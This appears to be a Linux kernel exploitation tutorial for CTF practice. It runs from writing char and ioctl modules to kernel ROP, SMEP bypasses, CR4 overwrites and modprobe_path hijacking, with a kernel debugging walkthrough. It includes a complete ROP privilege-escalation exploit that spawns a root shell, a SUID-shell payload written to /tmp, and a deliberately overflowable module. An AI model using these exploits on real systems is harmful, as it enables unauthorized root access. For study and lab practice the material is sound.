Writing a Char Module

The Code

Writing a Char Module is surprisingly simple. First, we specify what happens on init (loading of the module) and exit (unloading of the module). We need some special headers for this.

It looks simple, because it is simple. For now, anyway.

First we set the license, because otherwise we get a warning, and I hate warnings. Next we tell the module what to do on load (intro_init()) and unload (intro_exit()). Note that we declare the parameters as void; this is because kernel modules are very picky about requiring parameters (even if just void).

We then register the purposes of the functions using module_init() and module_exit().

Note that we use printk rather than printf. glibc doesn't exist in kernel mode, so we use the kernel's own built-in functions instead. KERN_ALERT specifies the type of message sent, and there are many more types.

Compiling

Compiling a Kernel Object can seem a little more complex as we use a Makefile, but it's surprisingly simple:

$(MAKE) is a special variable that effectively calls make, but it propagates all the same flags that our Makefile was called with. So, for example, if we call

Then $(MAKE) will become make -j 8. Essentially, $(MAKE) is make, which compiles the module. The files produced are defined at the top as obj-m. Note that compilation is unique per kernel, which is why the compiling process uses the build directory of your running kernel (/lib/modules/$(uname -r)/build).

Using the Kernel Module

Now that we've got a .ko file compiled, we can add it to the list of active modules:

If it's successful, there will be no response. But where did it print to?

Remember, the kernel program has no concept of userspace; it does not know you ran it, nor does it bother communicating with userspace. Instead, this code runs in the kernel, and we can check the output using sudo dmesg.

Here we grab the last line using tail - as you can see, our printk is called!

Now let's unload the module:

And there our intro_exit is called.

You can view currently loaded modules using the lsmod command

#include <linux/init.h>
#include <linux/module.h>

MODULE_LICENSE("Mine!");

static int intro_init(void) {
    printk(KERN_ALERT "Custom Module Started!\n");
    return 0;
}

static void intro_exit(void) {
    printk(KERN_ALERT "Custom Module Stopped :(\n");
}

module_init(intro_init);
module_exit(intro_exit);
obj-m += intro.o
 
all:
	$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
$ make -j 8
$ sudo insmod test.ko
$ sudo dmesg | tail -n 1
[ 3645.657331] Custom Module Started!
$ sudo rmmod test
$ sudo dmesg | tail -n 1
[ 4046.904898] Custom Module Stopped :(

An Interactive Char Driver

Creating an interactive char driver is surprisingly simple, but there are a few traps along the way.

Exposing it to the File System

This is by far the hardest part to understand, but honestly a full understanding isn't really necessary. The new intro_init function looks like this:

A major number is essentially the unique identifier to the kernel module. You can specify it using the first parameter of register_chrdev, but if you pass 0 it is automatically assigned an unused major number.

We then have to register the class and the device. In complete honesty, I don't quite understand what they do, but this code exposes the module to /dev/intro.

Note that on an error it calls class_destroy and unregister_chrdev:

Cleaning it Up

These additional classes and devices have to be cleaned up in the intro_exit function, and we mark the major number as available:

Controlling I/O

In intro_init, the first line may have been confusing:

The third parameter fops is where all the magic happens, allowing us to create handlers for operations such as read and write. A really simple one would look something like:

The parameters to intro_read may be a bit confusing, but the 2nd and 3rd ones line up with the 2nd and 3rd parameters of the read() function itself:

We then use the function copy_to_user to write QWERTY to the buffer passed in as a parameter!

Full Code

Simply use sudo insmod to load it, as we did before.

Testing The Module

Create a really basic exploit.c:

If the module is successfully loaded, the read() call should read QWERTY into buffer:

Success!

Interactivity with IOCTL

A more useful way to interact with the driver

Linux contains a syscall called ioctl, which is often used to communicate with a driver. ioctl() takes three parameters:

  • File Descriptor fd

  • an unsigned int

  • an unsigned long

The driver can be adapted to make the latter two virtually anything - perhaps a pointer to a struct or a string. In the driver source, the code looks along the lines of:

But if you want, you can interpret cmd and arg as pointers if that is how you wish your driver to work.

To communicate with the driver in this case, you would use the ioctl() function, which you can import in C:

And you would have to update the file_operations struct:

On modern Linux kernel versions, .ioctl has been removed and replaced by .unlocked_ioctl and .compat_ioctl. The former is the replacement for .ioctl, with the latter allowing 32-bit processes to perform ioctl calls on 64-bit systems. As a result, the new file_operations is likely to look more like this:

#define DEVICE_NAME "intro"
#define CLASS_NAME "intro"

// setting up the device
int major;
static struct class*  my_class  = NULL;
static struct device* my_device = NULL;

static int __init intro_init(void) {
    major = register_chrdev(0, DEVICE_NAME, &fops);    // explained later

    if (major < 0) {
        printk(KERN_ALERT "[Intro] Error assigning Major Number!\n");
        return major;                       // bail out with the error code
    }
    
    // Register device class
    my_class = class_create(THIS_MODULE, CLASS_NAME);
    if (IS_ERR(my_class)) {
        unregister_chrdev(major, DEVICE_NAME);
        printk(KERN_ALERT "[Intro] Failed to register device class\n");
        return PTR_ERR(my_class);           // do not carry on with an invalid class
    }

    // Register the device driver
    my_device = device_create(my_class, NULL, MKDEV(major, 0), NULL, DEVICE_NAME);
    if (IS_ERR(my_device)) {
        class_destroy(my_class);
        unregister_chrdev(major, DEVICE_NAME);
        printk(KERN_ALERT "[Intro] Failed to create the device\n");
        return PTR_ERR(my_device);
    }

    return 0;
}
static long ioctl_handler(struct file *file, unsigned int cmd, unsigned long arg) {
    // cmd is unsigned int and arg is unsigned long, so use matching format specifiers
    printk(KERN_INFO "Command: %u; Argument: %lu\n", cmd, arg);

    return 0;
}
static void __exit intro_exit(void) {
    device_destroy(my_class, MKDEV(major, 0));              // remove the device
    class_unregister(my_class);                             // unregister the device class
    class_destroy(my_class);                                // remove the device class
    unregister_chrdev(major, DEVICE_NAME);                  // unregister the major number
    printk(KERN_INFO "[Intro] Closing!\n");
}
major = register_chrdev(0, DEVICE_NAME, &fops);
static ssize_t intro_read(struct file *filp, char __user *buffer, size_t len, loff_t *off) {
    printk(KERN_ALERT "reading...");

    copy_to_user(buffer, "QWERTY", 6);

    return 0;
}

static struct file_operations fops = {
    .read = intro_read
};
ssize_t read(int fd, void *buf, size_t count);
#include <linux/init.h>
#include <linux/module.h>

#include <linux/kernel.h>
#include <linux/fs.h>
#include <linux/device.h>
#include <linux/uaccess.h>

#define DEVICE_NAME "intro"
#define CLASS_NAME "intro"

MODULE_AUTHOR("ir0nstone");
MODULE_DESCRIPTION("Interactive Drivers");
MODULE_LICENSE("GPL");

// setting up the device
int major;
static struct class*  my_class  = NULL;
static struct device* my_device = NULL;

static ssize_t intro_read(struct file *filp, char __user *buffer, size_t len, loff_t *off) {
    printk(KERN_ALERT "reading...");

    copy_to_user(buffer, "QWERTY", 6);

    return 0;
}

static struct file_operations fops = {
    .read = intro_read
};

static int __init intro_init(void) {
    major = register_chrdev(0, DEVICE_NAME, &fops);

    if (major < 0) {
        printk(KERN_ALERT "[Intro] Error assigning Major Number!\n");
        return major;                       // bail out with the error code
    }
    
    // Register device class
    my_class = class_create(THIS_MODULE, CLASS_NAME);
    if (IS_ERR(my_class)) {
        unregister_chrdev(major, DEVICE_NAME);
        printk(KERN_ALERT "[Intro] Failed to register device class\n");
        return PTR_ERR(my_class);           // do not carry on with an invalid class
    }

    // Register the device driver
    my_device = device_create(my_class, NULL, MKDEV(major, 0), NULL, DEVICE_NAME);
    if (IS_ERR(my_device)) {
        class_destroy(my_class);
        unregister_chrdev(major, DEVICE_NAME);
        printk(KERN_ALERT "[Intro] Failed to create the device\n");
        return PTR_ERR(my_device);
    }

    return 0;
}

static void __exit intro_exit(void) {
    device_destroy(my_class, MKDEV(major, 0));              // remove the device
    class_unregister(my_class);                             // unregister the device class
    class_destroy(my_class);                                // remove the device class
    unregister_chrdev(major, DEVICE_NAME);                  // unregister the major number
    printk(KERN_INFO "[Intro] Closing!\n");
}

module_init(intro_init);
module_exit(intro_exit);
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>

int main(void) {
    int fd = open("/dev/intro", O_RDWR);    // Open the device with RW access
    printf("FD: %d\n", fd);                 // print the file descriptor

    char buffer[7] = {0};                   // 6 bytes of data plus a null terminator
    memset(buffer, 'A', 6);                 // fill with As
    printf("%s\n", buffer);                 // print
    read(fd, buffer, 6);                    // read from module
    printf("%s\n", buffer);                 // print again

    return 0;
}
$ ./exploit

FD: 3
AAAAAA
QWERTY
#include <sys/ioctl.h>

// [...]

ioctl(fd, 0x100, 0x12345678);    // cmd = 0x100, arg = 0x12345678
static struct file_operations fops = {
    .ioctl = ioctl_handler
};
static struct file_operations fops = {
    .compat_ioctl = ioctl_handler,
    .unlocked_ioctl = ioctl_handler
};

Kernel ROP - Stack Pivoting

While the kernel cannot execute code in userland, it can set its RSP to a userland location, so it is possible to stack pivot to userland as long as all of the gadgets used are in kernel space.

I don't think an example is necessary for this.

SMEP

Supervisor Mode Execution Prevention

If ret2usr is analogous to ret2shellcode, then SMEP is the new NX. SMEP is a primitive protection that ensures any code executed in kernel mode is located in kernel space, and it does this based on the User/Supervisor bit in page tables. This means a simple ROP back to our own shellcode no longer works. To bypass SMEP, we have to use gadgets located in the kernel to achieve what we want (without switching to userland code).

In older kernel versions we could use ROP to disable SMEP entirely, but this has been patched out. This was possible because SMEP is controlled by the 20th bit of the CR4 register, meaning that if we can control CR4 we can stop SMEP from interfering with our exploit.

We can enable SMEP in the kernel by controlling the respective QEMU flag (qemu64 is not notable):

    -cpu qemu64,+smep

Sometimes it will be enabled by default, in which case you need to use nosmep (a kernel boot parameter).

Kernel ROP - Privilege Escalation in Kernel Space

Bypassing SMEP by ropping through the kernel

The previous approach failed, so let's try and escalate privileges using purely ROP.

Modifying the Payload

Calling prepare_kernel_cred()

First, we have to change the ropchain. Start off with finding some useful gadgets and calling prepare_kernel_cred(0):

Now comes the trickiest part, which involves moving the result from RAX to RDI before calling commit_creds().

Moving RAX to RDI for commit_creds()

This requires stringing together a collection of gadgets (which took me an age to find). See if you can find them!

I ended up combining these four gadgets:

  • Gadget 1 is used to set RDX to 0, so we bypass the jne in Gadget 2 and hit ret

  • Gadget 2 and Gadget 3 move the returned cred struct from RAX to RDX

Returning to userland

Recall that we need swapgs and then iretq. Both can be found easily.

The pop rbp; ret is not important as iretq jumps away anyway.

To simulate the pushing of RIP, CS, SS, etc we just create the stack layout as it would expect - RIP|CS|RFLAGS|SP|SS, the reverse of the order they are pushed in.

If we try this now, we successfully escalate privileges!

Final Exploit

Kernel ROP - Disabling SMEP

An old technique

Setup

Using the same setup as ret2usr, we make one single modification in run.sh:

Now if we load the VM and run our exploit from last time, we get a kernel panic.

Kernel Panic

It's worth noting what it looks like for the future - especially these 3 lines:

Overwriting CR4

So, instead of just returning back to userspace, we will try to overwrite CR4. Luckily, the kernel contains a very useful function for this: native_write_cr4(val). This function quite literally overwrites CR4.

Assuming KASLR is still off, we can get the address of this function via /proc/kallsyms (if we update init to log us in as root):

Ok, it's located at 0xffffffff8102b6d0. What do we want to change CR4 to? If we look at the kernel panic above, we see this line:

CR4 is currently 0x00000000001006b0. If we clear bit 20 (counting from the least significant bit, zero-indexed) we get 0x6b0.

The last thing we need to do is find some gadgets. To do this, we have to convert the bzImage file into a vmlinux ELF file so that we can run ropper or ROPgadget on it. To do this, we can run extract-vmlinux, from the official Linux git repository.

Putting it all together

All that changes in the exploit is the overflow:

We can then compile it and run.

Failure

This fails. Why?

If we look at the resulting kernel panic, we meet an old friend:

SMEP is enabled again. How? If we debug the exploit, we definitely hit both the gadget and the call to native_write_cr4(). What gives?

Well, if we look at the source, there's another feature:

Essentially, it will check if the val that we input disables any of the bits defined in cr4_pinned_bits. This value is set on boot, and stops "sensitive CR bits" from being modified. If they are, they are restored to their pinned values and CR4 is written again. Effectively, modifying CR4 doesn't work any longer - and hasn't since version 5.3-rc1.

Overwriting modprobe_path

A simple way to pop a shell

The kernel can request that a kernel module is loaded at runtime. If it does so, it will try to call request_module, which will spawn the modprobe tool using call_modprobe. modprobe is a userspace program that runs with root privileges, finds the required kernel module binary on the filesystem and loads it.

The path to modprobe is in modprobe_path, a global variable in the kernel. We can read the value as a non-root user through /proc/sys/kernel/modprobe, with the default value being /sbin/modprobe.

If we can overwrite modprobe_path with another binary, e.g. /tmp/exec, this will be run with root privileges! That makes it very easy. To trigger modprobe, the easiest way is to execute a binary with an unknown signature:

To identify what program should be run to handle the signature, the kernel uses binfmt (code is slightly different in newer versions). This ends up calling request_module, but the signature must contain at least one non-printable character.

The approach, therefore, is simple. First compile a /tmp/hijack with source:

There are lots of possible payloads, but the end result is the same. This will copy /bin/sh to /tmp/sh and make it SUID. Now we create a file with an unknown signature:

Finally, overwrite modprobe_path to /tmp/hijack. When we execute /tmp/fake as a regular user, the kernel will spawn /tmp/hijack with root privileges and execute it!

Example

TODO

#!/bin/sh

# the -cpu line below is the new addition
qemu-system-x86_64 \
    -kernel bzImage \
    -initrd initramfs.cpio \
    -append "console=ttyS0 quiet loglevel=3 oops=panic nokaslr pti=off" \
    -monitor /dev/null \
    -nographic \
    -no-reboot \
    -smp cores=2 \
    -cpu qemu64,+smep \
    -s
Gadget 4 moves it from RAX to RDI, then compares RDI to RDX. We need these to be equal to bypass the jne and hit the ret
[    1.628455] Yes? �U"��
[    1.628692] unable to execute userspace code (SMEP?) (uid: 1000)
[    1.631337] BUG: unable to handle page fault for address: 00000000004016b9
[    1.633781] #PF: supervisor instruction fetch in kernel mode
[    1.635878] #PF: error_code(0x0011) - permissions violation
[    1.637930] PGD 1296067 P4D 1296067 PUD 1295067 PMD 1291067 PTE 7c52025
[    1.639639] Oops: 0011 [#1] SMP
[    1.640632] CPU: 0 PID: 30 Comm: exploit Tainted: G           O       6.1.0 #6
[    1.646144] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
[    1.647030] RIP: 0010:0x4016b9
[    1.648108] Code: Unable to access opcode bytes at 0x40168f.
[    1.648952] RSP: 0018:ffffb973400c7e68 EFLAGS: 00000286
[    1.649603] RAX: 0000000000000000 RBX: 00000000004a8220 RCX: 00000000ffffefff
[    1.650321] RDX: 00000000ffffefff RSI: 00000000ffffffea RDI: ffffb973400c7d08
[    1.651031] RBP: 0000000000000000 R08: ffffffffb7ca6448 R09: 0000000000004ffb
[    1.651743] R10: 000000000000009b R11: ffffffffb7c8f2e8 R12: ffffb973400c7ef8
[    1.652455] R13: 00007ffdfe225520 R14: 0000000000000000 R15: 0000000000000000
[    1.653218] FS:  0000000001b57380(0000) GS:ffff9c1b07800000(0000) knlGS:0000000000000000
[    1.654086] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    1.654685] CR2: 00000000004016b9 CR3: 0000000001292000 CR4: 00000000001006b0
[    1.655452] Call Trace:
[    1.656167]  <TASK>
[    1.656846]  ? do_syscall_64+0x3d/0x90
[    1.658073]  ? entry_SYSCALL_64_after_hwframe+0x46/0xb0
[    1.660144]  </TASK>
[    1.660835] Modules linked in: kernel_rop(O)
[    1.662360] CR2: 00000000004016b9
[    1.663362] ---[ end trace 0000000000000000 ]---
[    1.664702] RIP: 0010:0x4016b9
[    1.665386] Code: Unable to access opcode bytes at 0x40168f.
[    1.666167] RSP: 0018:ffffb973400c7e68 EFLAGS: 00000286
[    1.668501] RAX: 0000000000000000 RBX: 00000000004a8220 RCX: 00000000ffffefff
[    1.669777] RDX: 00000000ffffefff RSI: 00000000ffffffea RDI: ffffb973400c7d08
[    1.670710] RBP: 0000000000000000 R08: ffffffffb7ca6448 R09: 0000000000004ffb
[    1.672122] R10: 000000000000009b R11: ffffffffb7c8f2e8 R12: ffffb973400c7ef8
[    1.672795] R13: 00007ffdfe225520 R14: 0000000000000000 R15: 0000000000000000
[    1.673471] FS:  0000000001b57380(0000) GS:ffff9c1b07800000(0000) knlGS:0000000000000000
[    1.673854] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    1.674124] CR2: 00000000004016b9 CR3: 0000000001292000 CR4: 00000000001006b0
[    1.674576] Kernel panic - not syncing: Fatal exception
[    1.689999] Kernel Offset: 0x36200000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff)
[    1.695855] ---[ end Kernel panic - not syncing: Fatal exception ]---
uint64_t pop_rdi    =  0xffffffff811e08ec;
uint64_t swapgs     =  0xffffffff8129011e;
uint64_t iretq      =  0xffffffff81022e1f;              // iretq; pop rbp; ret

uint64_t prepare_kernel_cred    = 0xffffffff81066fa0;
uint64_t commit_creds           = 0xffffffff81066e00;

int main() {
    // [...]

    // overflow
    uint64_t payload[25];       // large enough for the whole chain, which starts at index 6

    int i = 6;

    // prepare_kernel_cred(0)
    payload[i++] = pop_rdi;
    payload[i++] = 0;
    payload[i++] = prepare_kernel_cred;
    
    // [...]
}
0xffffffff810dcf72: pop rdx; ret
0xffffffff811ba595: mov rcx, rax; test rdx, rdx; jne 0x3ba58c; ret;
0xffffffff810a2e0d: mov rdx, rcx; ret;
0xffffffff8126caee: mov rdi, rax; cmp rdi, rdx; jne 0x46cae5; xor eax, eax; ret;
uint64_t pop_rdx                = 0xffffffff810dcf72;   // pop rdx; ret
uint64_t mov_rcx_rax            = 0xffffffff811ba595;   // mov rcx, rax; test rdx, rdx; jne 0x3ba58c; ret;
uint64_t mov_rdx_rcx            = 0xffffffff810a2e0d;   // mov rdx, rcx; ret;
uint64_t mov_rdi_rax            = 0xffffffff8126caee;   // mov rdi, rax; cmp rdi, rdx; jne 0x46cae5; xor eax, eax; ret;

// [...]

// commit_creds()
payload[i++] = pop_rdx;
payload[i++] = 0;
payload[i++] = mov_rcx_rax;
payload[i++] = mov_rdx_rcx;
payload[i++] = mov_rdi_rax;
payload[i++] = commit_creds;
0xffffffff8129011e: swapgs; ret;
0xffffffff81022e1f: iretq; pop rbp; ret;
// return to userland
payload[i++] = swapgs;
payload[i++] = iretq;
payload[i++] = user_rip;
payload[i++] = user_cs;
payload[i++] = user_rflags;
payload[i++] = user_rsp;
payload[i++] = user_ss;

payload[i++] = (uint64_t) escalate;
// gcc -static -o exploit exploit.c

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdint.h>

void get_shell(void){
    puts("[*] Returned to userland");
    system("/bin/sh");
}

uint64_t user_cs;
uint64_t user_ss;
uint64_t user_rsp;
uint64_t user_rflags;

uint64_t user_rip = (uint64_t) get_shell;

void save_state(){
    puts("[*] Saving state");

    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_rsp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );

    puts("[+] Saved state");
}

void escalate() {
    __asm__(
        ".intel_syntax noprefix;"
        "xor rdi, rdi;"
        "movabs rcx, 0xffffffff81066fa0;"   // prepare_kernel_cred
	    "call rcx;"
        
        "mov rdi, rax;"
	    "movabs rcx, 0xffffffff81066e00;"   // commit_creds
	    "call rcx;"

        "swapgs;"
        "mov r15, user_ss;"
        "push r15;"
        "mov r15, user_rsp;"
        "push r15;"
        "mov r15, user_rflags;"
        "push r15;"
        "mov r15, user_cs;"
        "push r15;"
        "mov r15, user_rip;"
        "push r15;"
        "iretq;"
        ".att_syntax;"
    );
}

uint64_t pop_rdi    =  0xffffffff811e08ec;
uint64_t swapgs     =  0xffffffff8129011e;
uint64_t iretq      =  0xffffffff81022e1f;              // iretq; pop rbp; ret

uint64_t prepare_kernel_cred    = 0xffffffff81066fa0;
uint64_t commit_creds           = 0xffffffff81066e00;

uint64_t pop_rdx                = 0xffffffff810dcf72;   // pop rdx; ret
uint64_t mov_rcx_rax            = 0xffffffff811ba595;   // mov rcx, rax; test rdx, rdx; jne 0x3ba58c; ret;
uint64_t mov_rdx_rcx            = 0xffffffff810a2e0d;   // mov rdx, rcx; ret;
uint64_t mov_rdi_rax            = 0xffffffff8126caee;   // mov rdi, rax; cmp rdi, rdx; jne 0x46cae5; xor eax, eax; ret;

int main() {
    save_state();

    // communicate with the module
    int fd = open("/dev/kernel_rop", O_RDWR);
    printf("FD: %d\n", fd);

    // overflow
    uint64_t payload[25];

    int i = 6;

    // prepare_kernel_cred(0)
    payload[i++] = pop_rdi;
    payload[i++] = 0;
    payload[i++] = prepare_kernel_cred;

    // commit_creds()
    payload[i++] = pop_rdx;
    payload[i++] = 0;
    payload[i++] = mov_rcx_rax;
    payload[i++] = mov_rdx_rcx;
    payload[i++] = mov_rdi_rax;
    payload[i++] = commit_creds;
        

    // return to userland
    payload[i++] = swapgs;
    payload[i++] = iretq;
    payload[i++] = user_rip;
    payload[i++] = user_cs;
    payload[i++] = user_rflags;
    payload[i++] = user_rsp;
    payload[i++] = user_ss;

    payload[i++] = (uint64_t) escalate;

    write(fd, payload, 0);
}
[    1.628692] unable to execute userspace code (SMEP?) (uid: 1000)
[    1.631337] BUG: unable to handle page fault for address: 00000000004016b9
[    1.633781] #PF: supervisor instruction fetch in kernel mode
~ # cat /proc/kallsyms | grep native_write_cr4
ffffffff8102b6d0 T native_write_cr4
[    1.654685] CR2: 00000000004016b9 CR3: 0000000001292000 CR4: 00000000001006b0
$ ./extract-vmlinux bzImage > vmlinux
$ file vmlinux 
vmlinux: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=3003c277e62b32aae3cfa84bb0d5775bd2941b14, stripped
$ ropper -f vmlinux --search "pop rdi"
0xffffffff811e08ec: pop rdi; ret;
// overflow
uint64_t payload[20];

int i = 6;

payload[i++] = 0xffffffff811e08ec;      // pop rdi; ret
payload[i++] = 0x6b0;
payload[i++] = 0xffffffff8102b6d0;      // native_write_cr4
payload[i++] = (uint64_t) escalate;

write(fd, payload, 0);
[    1.542923] unable to execute userspace code (SMEP?) (uid: 0)
[    1.545224] BUG: unable to handle page fault for address: 00000000004016b9
[    1.547037] #PF: supervisor instruction fetch in kernel mode
void __no_profile native_write_cr4(unsigned long val)
{
	unsigned long bits_changed = 0;

set_register:
	asm volatile("mov %0,%%cr4": "+r" (val) : : "memory");

	if (static_branch_likely(&cr_pinning)) {
		if (unlikely((val & cr4_pinned_mask) != cr4_pinned_bits)) {
			bits_changed = (val & cr4_pinned_mask) ^ cr4_pinned_bits;
			val = (val & ~cr4_pinned_mask) | cr4_pinned_bits;
			goto set_register;
		}
		/* Warn after we've corrected the changed bits. */
		WARN_ONCE(bits_changed, "pinned CR4 bits changed: 0x%lx!?\n",
			  bits_changed);
	}
}
echo -e '\xff\xff\xff\xff' > /tmp/fake
chmod +x /tmp/fake
/tmp/fake
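#include <stdlib.h>     // system()

int main(void)
{
    system("cp /usr/bin/sh /tmp/sh");       // copy the shell
    system("chown root:root /tmp/sh");      // make root the owner
    system("chmod 4755 /tmp/sh");           // set the SUID bit
    return 0;
}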
echo -n -e '\xff\xff\xff\xff' > /tmp/fake
chmod +x /tmp/fake

Introduction

The kernel is the program at the heart of the Operating System. It is responsible for controlling every aspect of the computer, from the nature of syscalls to the integration between software and hardware. As such, exploiting the kernel can lead to some incredibly dangerous bugs.

In the context of CTFs, Linux kernel exploitation often involves the exploitation of kernel modules. This is an integral feature of Linux that allows users to extend the kernel with their own code, adding additional features.

You can find an excellent introduction to Kernel Drivers and Modules by LiveOverflow here, and I recommend it highly.

Kernel Modules

Kernel Modules are written in C and compiled to a .ko (Kernel Object) format. Most kernel modules are compiled for a specific kernel version (which can be checked with uname -r; my Xenial Xerus is 4.15.0-128-generic). We can load and unload these modules using the insmod and rmmod commands respectively. Kernel modules are often exposed under /dev/* or /proc/. There are 3 main module types: Char, Block and Network.

Char Modules

Char Modules are deceptively simple. Essentially, you can access them as a stream of bytes - just like a file - using syscalls such as open. In this way, they're almost like dynamic files (at a super basic level), as the values read and written can be changed.

Examples of Char modules include /dev/random.

I'll be using the term module and device interchangeably. As far as I can tell, they are the same, but please let me know if I'm wrong!

A Basic Kernel Interaction Challenge

The Module

We're going to create a really basic authentication module that allows you to read the flag if you input the correct password. Here is the relevant code:

If we attempt to read() from the device, it checks the authenticated flag to see if it can return us the flag. If not, it sends back FAIL: Not Authenticated!.

In order to update authenticated, we have to write() to the kernel module. What we attempt to write is compared to p4ssw0rd. If it's not equal, nothing happens. If it is, authenticated is updated and the next time we read() it'll return the flag!

Interacting

Let's first try and interact with the kernel by reading from it.

Make sure you sudo chmod 666 /dev/authentication!

We'll start by opening the device and reading from it.

Note that in the module source code, the length of read() is completely disregarded, so we could make it any number at all! Try switching it to 1 and you'll see.

After compiling, we get that we are not authenticated:

Epic! Let's write the correct password to the device then try again. It's really important to send the null byte here! That's because copy_from_user() does not automatically add it, so the strcmp will fail otherwise!

It works!

Amazing! Now for something really important:

The state is preserved between connections! Because the kernel module remains on, you will be authenticated until the module is reloaded (either via rmmod then insmod, or a system restart).

Final Code

Challenge - IOCTL

So, here's your challenge! Write the same kernel module, but using ioctl instead. Then write a program to interact with it and perform the same operations. A ZIP file including both is below, but no cheating! This is really good practice.

#define PASSWORD    "p4ssw0rd"
#define FLAG        "flag{YES!}"
#define FAIL        "FAIL: Not Authenticated!"

static int authenticated = 0;

static ssize_t auth_read(struct file *filp, char __user *buf, size_t len, loff_t *off) {
    printk(KERN_ALERT "[Auth] Attempting to read flag...");

    if (authenticated) {
        copy_to_user(buf, FLAG, sizeof(FLAG));      // ignoring `len` here
        return 1;
    }

    copy_to_user(buf, FAIL, sizeof(FAIL));
    return 0;
}

static ssize_t auth_write(struct file *filp, const char __user *buf, size_t count, loff_t *f_pos) {
    char password_attempt[20];

    printk(KERN_ALERT "[Auth] Reading password from user...");

    copy_from_user(password_attempt, buf, count);

    if (!strcmp(password_attempt, PASSWORD)) {
        printk(KERN_ALERT "[Auth] Password correct!");
        authenticated = 1;
        return 1;
    }

    printk(KERN_ALERT "[Auth] Password incorrect!");

    return 0;
}
basic_interaction.zip (2KB): The Source Code
basic_authentication_ioctl.zip (2KB): Potential Solution
int fd = open("/dev/authentication", O_RDWR);

char buffer[32];    // the module copies sizeof(FAIL) = 25 bytes regardless of len
read(fd, buffer, 20);
printf("%s\n", buffer);
$ ./exploit 
FAIL: Not Authenticated!
write(fd, "p4ssw0rd\0", 9);

read(fd, buffer, 20);
printf("%s\n", buffer);
$ ./exploit
FAIL: Not Authenticated!
flag{YES!}
$ ./exploit 
flag{YES!}
flag{YES!}
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>

int main() {
    int fd = open("/dev/authentication", O_RDWR);

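    char buffer[32];                // the module copies up to 25 bytes regardless of len
    read(fd, buffer, 1);
    printf("%s\n", buffer);

    write(fd, "p4ssw0rd", 9);       // 9 bytes: include the terminating null byte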

    read(fd, buffer, 20);
    printf("%s\n", buffer);
}

Debugging a Kernel Module

A practical example

Trying on the Latest Kernel

Let's try and run our previous code, but with the latest kernel version (as of writing, 6.10-rc5). The offsets of commit_creds and prepare_kernel_cred() are as follows, and we'll update exploit.c with the new values:

The major number needs to be updated to 253 in init for this version! I've done it automatically, but it bears remembering if you ever try to create your own module.

Instead of an elevated shell, we get a kernel panic, with the following data dump:

I could have left this part out of my blog, but it's valuable to know a bit more about debugging the kernel and reading error messages. I actually came across this issue while , so it happens to all of us!

One thing we can notice is that the error here is listed as a NULL pointer dereference. We can see that the error is thrown in commit_creds():

We can , but chances are that the parameter passed to commit_creds() is NULL - this appears to be the case, since RDI is shown to be 0 above!

Opening a GDBserver

In our run.sh script, we now include the -s flag. This flag opens up a GDB server on port 1234, so we can connect to it and debug the kernel. Another useful flag is -S, which will automatically pause the kernel on load to allow us to debug, but that's not necessary here.

What we'll do is pause our exploit binary just before the write() call by using getchar(), which will hang until we hit Enter or something similar. Once it pauses, we'll hook on with GDB. Knowing the address of commit_creds() is 0xffffffff81077390, we can set a breakpoint there.
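A minimal sketch of that pause, assuming a hypothetical helper called wait_for_enter() (it is not part of the original exploit). It takes the input stream as a parameter so it can be exercised without a terminal; in the exploit it would be called with stdin just before write().

```c
#include <assert.h>
#include <stdio.h>

/* Hypothetical helper: block until a newline (or EOF) arrives on `in`.
 * Returns the number of characters consumed, including the newline. */
static int wait_for_enter(FILE *in) {
    assert(in != NULL);

    int consumed = 0;
    int c;
    while ((c = fgetc(in)) != EOF) {
        consumed++;
        if (c == '\n')
            break;
    }
    return consumed;
}
```

In the exploit this would sit right before the overflow, e.g. puts("[*] Attach GDB, then press Enter"); wait_for_enter(stdin); so the process is parked while the breakpoint is set.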

We then continue with c and go back to the VM terminal, where we hit Enter to continue the exploit. Coming back to GDB, it has hit the breakpoint, and we can see that RDI is indeed 0:

This explains the NULL dereference. RAX is also 0, in fact, so it's not a problem with the mov:

This means that prepare_kernel_cred() is returning NULL. Why is that? It didn't do that before!

hashtag
Finding the Issue

Let's compare the differences in prepare_kernel_cred() code between kernel version 6.1 and version 6.10:

The last and first parts are effectively identical, so there's no issue there. The issue arises in the way it handles a NULL argument. On 6.1, it treats it as using init_task:

i.e. if daemon is NULL, use init_task. On 6.10, the behaviour is altogether different:

If daemon is NULL, return NULL - hence our issue! Instead, we have to pass a valid cred struct into RDI. The simplest way is to just pass init_cred, which is actually a static offset from the kernel base! This means that if we're in a position to get commit_creds and prepare_kernel_cred, we can also get init_cred without major issues.
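To make the difference concrete, here is a small userland model of the two NULL-handling paths. It is only a sketch: the struct definitions are toy stand-ins, and pick_source_old(), pick_source_new() and uid_of() are hypothetical names invented for illustration, not kernel functions.

```c
#include <assert.h>
#include <stddef.h>

/* Toy stand-ins for the kernel types; only what the model needs. */
struct cred { unsigned int uid; };
struct task_struct { const struct cred *cred; };

static const struct cred init_cred = { .uid = 0 };  /* root credentials */

/* Older behaviour: a NULL daemon falls back to init_cred. */
static const struct cred *pick_source_old(const struct task_struct *daemon) {
    return daemon ? daemon->cred : &init_cred;
}

/* Newer behaviour: a NULL daemon is rejected outright. */
static const struct cred *pick_source_new(const struct task_struct *daemon) {
    if (!daemon)
        return NULL;
    return daemon->cred;
}

/* Stands in for the consumer of the result: it dereferences its argument,
 * which is where a NULL return turns into a crash. */
static unsigned int uid_of(const struct cred *c) {
    assert(c != NULL);
    return c->uid;
}
```

Feeding NULL through the old path yields root credentials, while the new path hands NULL to the consumer, mirroring the RDI value of 0 seen in the panic.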

hashtag
Passing in init_cred

init_cred is defined here. There is no symbol associated with it (unless the kernel was compiled with debugging symbols), so we can't read /proc/kallsyms and get the address like that.

Kernel ROP - ret2usr

ROPpety boppety, but now in the kernel

hashtag
Introduction

